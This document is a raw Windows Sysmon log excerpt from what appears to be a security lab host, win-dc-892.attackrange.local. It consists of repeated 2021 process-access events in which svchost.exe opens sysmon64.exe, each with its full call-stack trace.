12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002065Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002064Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002063Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002062Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002061Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002060Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002059Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002058Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002057Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002056Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002055Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.440{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002054Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002053Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002052Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002051Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002050Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002049Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002048Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002047Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002046Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002045Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002044Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002043Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:02.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002042Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 